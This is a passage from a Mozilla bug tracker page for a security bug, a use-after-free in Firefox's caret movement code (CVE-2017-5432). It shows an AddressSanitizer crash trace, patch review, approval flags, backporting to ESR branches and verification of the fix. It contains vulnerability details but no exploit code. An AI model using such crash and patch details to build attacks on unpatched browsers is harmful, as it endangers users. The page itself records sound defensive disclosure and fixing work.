#34 0x7fc2c4a2917f in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:448
#35 0x7fc2c4a29b72 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:512:10
#36 0x7fc2c56a971c in js::Wrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:165:12
#37 0x7fc2c56603ae in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:353:14
SUMMARY: AddressSanitizer: heap-use-after-free /home/worker/workspace/build/src/layout/generic/nsSelection.cpp:972:8 in nsFrameSelection::MoveCaret(nsDirection, bool, nsSelectionAmount, nsFrameSelection::CaretMovementStyle)
Shadow bytes around the buggy address:
0x0c2280056870: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fa
0x0c2280056880: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
0x0c2280056890: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c22800568a0: fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa fa
0x0c22800568b0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
=>0x0c22800568c0: fd fd fd fd fd fd fd[fd]fd fd fd fd fd fa fa fa
0x0c22800568d0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
0x0c22800568e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c22800568f0: 00 fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c2280056900: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c2280056910: fd fd fd fd fd fd fd fd fd fd fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==19751==ABORTING
|
||
Updated•8 years ago
|
Flags: sec-bounty?
|
|
||
Comment 1•8 years ago
|
||
Can you take a look at this, Masayuki?
Group: core-security → dom-core-security
Flags: needinfo?(masayuki)
|
Assignee | |
Comment 2•8 years ago
|
||
We flush layout without keeping presshell alive :/
|
|
Assignee | |
Updated•8 years ago
|
Assignee: nobody → bugs
|
||
Updated•8 years ago
|
Flags: needinfo?(masayuki)
|
|
Assignee | |
Comment 3•8 years ago
|
||
Looks like there is something else going on too... need to keep more objects alive I guess.
|
|
Assignee | |
Comment 4•8 years ago
|
||
nsTextInputSelectionImpl should keep frameselection alive before doing anything non-trivial with it. So, just following COM rules here.
Attachment #8848309 -
Flags: review?(ehsan)
|
||
Comment 5•8 years ago
|
||
Comment on attachment 8848309 [details] [diff] [review]
patch
Review of attachment 8848309 [details] [diff] [review]:
-----------------------------------------------------------------
Sigh :(
Attachment #8848309 -
Flags: review?(ehsan) → review+
|
|
Assignee | |
Comment 6•8 years ago
|
||
Comment on attachment 8848309 [details] [diff] [review]
patch
[Security approval request comment]
How easily could an exploit be constructed based on the patch? Not sure about exploit, but crash is probably not very hard to find
Do comments in the patch, the check-in comment, or tests included in the patch paint a bulls-eye on the security problem?
The patch itself pinpoints what the issue is
Which older supported branches are affected by this flaw?
all
Do you have backports for the affected branches? If not, how different, hard to create, and risky will they be?
How likely is this patch to cause regressions; how much testing does it need?
Should be very safe
Attachment #8848309 -
Flags: sec-approval?
Attachment #8848309 -
Flags: approval-mozilla-beta?
Attachment #8848309 -
Flags: approval-mozilla-aurora?
|
|
Assignee | |
Comment 7•8 years ago
|
||
(In reply to Olli Pettay [:smaug] from comment #6)
> Do you have backports for the affected branches? If not, how different, hard
> to create, and risky will they be?
The same patch applies to nightly, aurora and beta
|
||
Comment 8•8 years ago
|
||
This needs a rating for sec-approval.
This looks to me like a sec-critical. Do you agree?
Flags: needinfo?(bugs)
|
||
Comment 10•8 years ago
|
||
With sec-approval we could still get this into the beta 6 build on Thursday. Does it also affect 52?
Flags: needinfo?(abillings)
Keywords: sec-critical
|
|
||
Comment 11•8 years ago
|
||
sec-approval+ for trunk.
Liz, this affects 52.
We should get patches for all affected branches (including ESR ones) made and nominated as well.
status-firefox52:
--- → wontfix
status-firefox53:
--- → affected
status-firefox54:
--- → affected
status-firefox-esr45:
--- → affected
status-firefox-esr52:
--- → affected
tracking-firefox53:
--- → +
tracking-firefox54:
--- → +
tracking-firefox55:
--- → +
tracking-firefox-esr45:
--- → 53+
tracking-firefox-esr52:
--- → 53+
Flags: needinfo?(abillings)
|
|
||
Comment 12•8 years ago
|
||
Comment on attachment 8848309 [details] [diff] [review]
patch
(I've given Beta and Aurora approval, BTW)
Attachment #8848309 -
Flags: sec-approval?
Attachment #8848309 -
Flags: sec-approval+
Attachment #8848309 -
Flags: approval-mozilla-beta?
Attachment #8848309 -
Flags: approval-mozilla-beta+
Attachment #8848309 -
Flags: approval-mozilla-aurora?
Attachment #8848309 -
Flags: approval-mozilla-aurora+
|
||
Comment 13•8 years ago
|
||
smaug: can you land this on trunk today or shall we sheriffs do this for you to ensure this is on time for beta 6 ?
Flags: needinfo?(bugs)
|
|
Assignee | |
Comment 14•8 years ago
|
||
Flags: needinfo?(bugs)
|
||
Comment 15•8 years ago
|
||
Comment on attachment 8848309 [details] [diff] [review]
patch
We need this on the ESR branches as well AFAICT.
Attachment #8848309 -
Flags: approval-mozilla-esr52?
Attachment #8848309 -
Flags: approval-mozilla-esr45?
|
|
||
Comment 16•8 years ago
|
||
| uplift | ||
Status: NEW → RESOLVED
Closed: 8 years ago
Resolution: --- → FIXED
Target Milestone: --- → mozilla55
|
||
Comment 18•8 years ago
|
||
Comment on attachment 8848309 [details] [diff] [review]
patch
sec-critical uaf fix for esr45/esr52
Attachment #8848309 -
Flags: approval-mozilla-esr52?
Attachment #8848309 -
Flags: approval-mozilla-esr52+
Attachment #8848309 -
Flags: approval-mozilla-esr45?
Attachment #8848309 -
Flags: approval-mozilla-esr45+
|
|
||
Comment 19•8 years ago
|
||
| uplift | ||
|
|
||
Updated•8 years ago
|
Flags: sec-bounty? → sec-bounty+
|
|
||
Updated•8 years ago
|
Group: dom-core-security → core-security-release
|
|
||
Updated•8 years ago
|
Whiteboard: [adv-main53+][adv-esr52.1+][adv-esr45.9+]
|
|
||
Updated•8 years ago
|
Alias: CVE-2017-5432
|
||
Updated•8 years ago
|
Whiteboard: [adv-main53+][adv-esr52.1+][adv-esr45.9+] → [adv-main53+][adv-esr52.1+][adv-esr45.9+][post-critsmash-triage]
|
|
||
Comment 21•8 years ago
|
||
sec-critical is probably overstating it slightly given the necessity of fuzzPriv.trustedKeyEvent(). You could probably lure some users into doing that, but it wouldn't be guaranteed and wouldn't be a silent attack. Going with sec-high.
Keywords: sec-critical → sec-high
|
||
Comment 22•8 years ago
|
||
I reproduced this issue with the nightly asan build from 12 march 2017 using Ubuntu 14.04 LTS.
I can confirm this issue is fixed, I verified on Ubuntu 14.04 LTS, using:
-Fx 55.0a1 (2017-04-19) ASAN build
-Fx 54.0a2 (2017-04-20) ASAN build
-Fx 53.0b12 ASAN build
-Fx 52.1.0ESR ASAN build
-Fx 45.9.0ESR ASAN build
Note that on Firefox 45.9.0 ESR ASAN and Firefox 45.9.0 ESR builds the tests were performed without installing install domfuzz_helper-2012.07.07-fx+fn+an.xpi, since it's not compatible with these two builds.
Please let me know if it's necessary to perform another set of tests on 45.9.0ESR builds.
Cheers!
Status: RESOLVED → VERIFIED
Flags: qe-verify+
|
|
||
Updated•8 years ago
|
Keywords: csectype-uaf
|
|
||
Updated•7 years ago
|
Group: core-security-release
|
||
Updated•8 months ago
|
Keywords: reporter-external
You need to log in
before you can comment on or make changes to this bug.
Description
•